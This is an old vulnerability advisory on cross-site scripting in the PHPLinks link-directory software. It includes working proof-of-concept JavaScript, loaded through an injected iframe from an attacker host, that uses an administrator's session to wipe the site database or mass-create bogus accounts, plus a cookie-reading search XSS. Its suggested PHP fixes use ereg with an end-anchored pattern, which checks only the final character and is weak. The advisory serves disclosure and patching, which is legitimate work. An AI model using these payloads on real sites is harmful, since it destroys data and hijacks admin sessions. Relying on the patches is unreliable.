21th Jan 2003 [SBWID-5941]
COMMAND
	PHPLinks multiple vulnerabilties
SYSTEMS AFFECTED
	latest ? (as of 21 January 2003)
PROBLEM
	JeiAr     from     CyberArmy     Security     Research     ACAT     Team
	[http://www.gulftech.org], [http://www.security-research.org] says :
	There lies a fault in the include/add.php script that  allows  a  remote
	attacker to inject code into the script and have it  run  as  an  admin.
	The vulnerability comes from  improper  input  validation  and  improper
	session authentication. Below Is some example code that I have written.
	Put this in one of the field on "Add Site" form located at
	
	 http://blah/phplinks/index.php?show=add&PID= 
	
	If you inject the code into the Site Title or Site Url field,  the  code
	will be ran as soon as a logged in administrator views it.
	
	 <iframe src=http://blah/death.html></iframe>
	
	Below is the code for the called file "death.html"
	
	---------------------------------------------------------------------------
	<script language=JavaScript>
	var i = 10; // This is the number of the user ID to start deleting
	var BaseURL = "http://victimsite/phplinks/";
	window.open(BaseURL + '/admin/reset.php?
	reset_in=&reset_out=&search_terms=&referrers=&submit='); // this resets 
	the database
	function Waste()
	{
	while (i) {
	i++;
	window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i 
	+ '&sure=Yes');
	 }
	}
	</script>
	<body onLoad="Waste();">
	---------------------------------------------------------------------------
	
	As you can see, that code (when called by a logged in  admin  validating
	sites) is run, the database is in alot of cases going to be left  empty.
	By the way, the dbtable=links can be changed to  dbtable=temp  in  order
	to affect sites not yet approved etc. On the  other  hand  you  can  add
	users to the database and more. Take the following code for example
	
	 <iframe src=http://blah/life.html></iframe>
	
	Below is the code for the called file "life.html"
	
	---------------------------------------------------------------------------
	<script language=JavaScript>
	var i = 1;
	var BaseURL = "http://victimsite/phplinks/";
	function Gluttony()
	{
	while (i) {
	i++;
	window.open(BaseURL + '/admin/add_site.php?SiteName=JeiAr0wnethTheee' + i 
	+ '&SiteURL=http://www.b' + i + 'j.orfd&Description=' + i 
	+'3333333333333333333333333333333333&Category=&Country=Turkey.gif&Email=1@t
	.' + i + '&UserName=12345' + i 
	+ '&Password=12345678&Hint=12345678910&add=' + i + '&sure=Yes');
	 }
	}
	</script>
	<body onLoad="Gluttony();">
	---------------------------------------------------------------------------
	
	Once again, when a logged in admin goes to validate sites  (unless  they
	have a popup killer, JS disabled, etc.) they are gonna  be  adding  MANY
	users to the database before they really realize what's happening.  This
	also jolt's the server quit a bit  by  hogging  up  resources.  You  can
	basically change almost anything that the admin can  by  just  injecting
	code. Also, note that these proof of concept scripts  could  be  altered
	to supply large numbers of malformed site submissions, and instead  make
	it something worse like popunder windows etc.  But  I  do  not  feel  it
	would be very good to release a script like that publicly :)  Also  note
	that for whatever reason the most updated norton AV does not  pick  this
	script up as a window  bomb.  Maybe  it's  cause  my  JavaScript  is  so
	bastardized it doesn't recognize the  code  at  all.  heheh  j/k  I  put
	together a quick fix. I am no php guru, so if  there  is  a  better  way
	then please correct me :)
	In the includes/add.php file find the following
	
	// Handle form submission
	if(isset($submit_add)){
	And right below it paste the following code
	//////////////////////////////////////////////////////////////////////////
	// PHPLinks Critical XSS Vulnerability Fix - By JeiAr - [email protected] //
	//////////////////////////////////////////////////////////////////////////
	$ip = $REMOTE_ADDR;
	$info = $HTTP_USER_AGENT;
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $SiteName)) {$err.= "Please enter 
	A valid Site Name.<BR>";}    
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $SiteURL)) {$err.= "Please enter 
	A valid Site URL.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Description)) {$err.= "Enter A 
	valid Description.<BR>";}    
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Category)) {$err.= "Enter A 
	valid Category.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Country)) {$err.= "Enter A valid 
	Country.<BR>";}    
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $UserName)) {$err.= "Enter A 
	valid UserName.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $PW)) {$err.= "Please enter A 
	valid Password.<BR>";}    
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $PW2)) {$err.= "Please enter A 
	valid Password.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Hint)) {$err.= "Please enter A 
	valid Hint.<BR>";}    
	if ($err) {
	echo $err;
	echo "<b>Possible Hack Attempt!!</b><br>";
	echo "<b>$ip</b><br>";
	echo "<b>$info</b><br>";
	echo "<a href=index.php?show=add>Back</a>";
	exit;
	}
	/////////////////////////////////////////////////////////////////////////
	
	There is also a much less serious, but similar  issue  with  the  search
	feature. You can basically execute just about  any  JavaScript  or  HTML
	code and maybe more? Here is an example
	
	 http://www.blah.org/index.php?term=<script>alert(document.cookie)</script>
	
	And if you write a  script  to  send  many  automated  malformed  search
	strings, the code will show up with the most searched for terms  on  the
	main search page,  thus  running  any  code  you  supply  on  the  sites
	visitors browsers. Below is a quick fix for that, I basically just  ereg
	the input for invalid metacharacters.
	in includes/results.php find the following
	
	if(isset($term) && strlen($term)>0){
	Below it place the following
	/////////////////////////////////////////////////////////////////////////
	// PHPLinks XSS Vulnerability Fix - By JeiAr - [email protected] 01-2003 //
	/////////////////////////////////////////////////////////////////////////
	$ip = $REMOTE_ADDR;
	$info = $HTTP_USER_AGENT;
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $term)) {$err.= "Please enter A 
	valid Search Term.<BR>";}    
	if ($err) {
	echo $err;
	echo "<b>Possible Hack Attempt!!</b><br>";
	echo "<b>$ip</b><br>";
	echo "<b>$info</b><br>";
	echo "<a href=index.php>Back</a>";
	exit;
	}
	////////////////////////////////////////////////////////////////////////
	
	One bad thing about the most searched  for  keywords  feature,  is  that
	anyone can put their web page, name, or something obscene  as  a  search
	term. After clicking submit xxx number of times, they now have  whatever
	they want on your main search page. Not really  a  security  issue,  but
	could be annoying. Don't ya think? And if someone  used  some  CSS  they
	could basically deface the site in a really lame kinda way ..
SOLUTION
	?